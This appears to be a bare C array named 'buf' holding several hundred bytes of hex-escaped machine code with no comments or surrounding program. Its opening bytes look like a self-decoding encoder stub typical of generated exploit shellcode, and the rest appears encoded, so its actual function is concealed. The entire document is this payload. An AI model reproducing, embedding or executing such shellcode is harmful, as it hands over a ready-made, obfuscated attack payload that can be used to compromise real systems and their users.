unsigned char buf[] = 
"\xda\xdf\xbd\xaa\x3c\xc6\xd9\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x77\x31\x6b\x1a\x03\x6b\x1a\x83\xeb\xfc\xe2\x5f\x86\xcc\x5b"
"\x20\x38\x09\x8b\x87\xb3\x8e\xd8\x69\x17\x06\x91\xe4\x56\xce"
"\xc0\x85\x5f\xea\xe7\xd5\xd3\xae\xdd\x5c\xb6\x4f\x5d\xb3\xd9"
"\xe6\xf8\xf2\xd1\xa5\xfc\xf4\x7b\x53\xd0\x37\x17\x41\x74\x51"
"\x63\x9f\xa4\xdb\x11\x83\x5b\x53\x27\x54\x8d\x99\x3f\x01\x3d"
"\x68\xbe\xfa\x3c\xdc\x59\xb5\x08\x6b\xc3\x12\x62\x48\xcf\xed"
"\x14\x44\xe6\x83\xde\x0e\x95\x0d\x7e\xf0\x48\x94\xbb\x53\xd0"
"\xfb\xf3\x32\xf9\xaf\x98\x7e\x35\xd0\x42\x6e\x4c\xc3\x1b\x30"
"\x6f\x10\xe4\x0c\x15\x42\xe2\x45\x2a\xc7\x2f\x3e\x28\xb4\x67"
"\xf4\xd7\xca\x00\xb5\xd7\x8e\x87\x22\xc3\xfe\xf3\xb0\x1a\xbe"
"\xa4\x01\xc6\x8f\xb8\x74\x93\xd2\x4a\x50\x59\x97\xc4\x27\x7f"
"\x1b\xb5\xee\xae\x3d\xd1\x25\xc1\xc9\x19\x8c\xd3\xd9\xb9\x77"
"\xf6\x73\xa9\xc7\x15\x5c\x31\x17\x70\x84\x12\x4d\xd0\x1e\x1f"
"\x22\x9e\xdc\x5a\x08\x58\x2a\xa5\x55\x7b\x36\xeb\xbb\x89\xca"
"\xa0\x1a\xcc\x9c\x23\x7c\xce\x70\x99\x10\x44\x84\xb2\xab\x37"
"\x5e\xac\xc8\xfa\xb1\x37\xb2\xbf\xa8\x52\x44\x3d\x56\xe5\xf7"
"\x0f\xee\xb9\xec\x62\x54\x6c\x8a\x11\xd6\xc1\x28\x6a\x9c\x1f"
"\x1b\xa4\x7f\xc5\x47\x2d\xb5\xd7\x7d\xbe\xdb\x9d\x4a\xa7\x3e"
"\xf1\xeb\x59\x6c\xa3\xe3\x9b\xe5\xbc\x23\xa9\x11\x98\x33\x26"
"\x62\xb0\x3b\x53\x17\xd1\x7c\xc2\x05\x90\xca\xe1\xf1\x17\x00"
"\x9a\x70\xb2\x86\xc0\x8a\x65\x01\xe6\x0f\xc7\xc8\xd1\xd6\xdd"
"\xa0\xf7\x94\xbf\xbc\xf2\x97\xc1\xed\xd1\x07\x2a\xe9\xa7\xd4"
"\xe3\x11\xcc\xe6\x5d\x5d\xad\xb6\xd3\x5a\xc5\xc7\xc2\x32\x9c"
"\xf5\x02\x77\xe4\xe1\x08\x76\xe5\xb1\x80\x3f\x7a\xc5\x88\xee"
"\xe8\xdf\x01\x1d\x86\xf3\x18\xbf\x66\xa4\x47\xc4\xc2\x48\xe3"
"\xd5\x26\xca\x5d\x94\x47\x9a\x6a\x7d\x79\x50\x34\x28\xfc\x51"
"\x54\x45\xb6\xe2\xdf\xa1\x09\xb7\xde\x80\x29\x01\x8a\xa8\x80"
"\xf7\x61\x4f\x10\x0c\x8e\x53\xa7\x5c\x9f\x36\x69\x1a\xcf\xb3"
"\x46\x31\xb3\x4f\x38\xf4\xe3\x9d\x06\x13\xa9\xfd\x75\xf3\x57"
"\xbb\xaa\xdf\x81\x11\x4e\xe0\x4f\x17\xa8\xd3\x97\xfa\x0d\xf5"
"\x5b\x0a\xf9\x50\x33\x7e\x96\xc8\x4c\x6f\x27\xfa\x13\xfe\x3e"
"\x7f\x97\x2d\xdd\x8a\xf2\xe6\xa9\x9f\x77\xdc\x6e\x33\x33\xd4"
"\xb8\xf6\xe4\xc4\xea\x84\xbb";
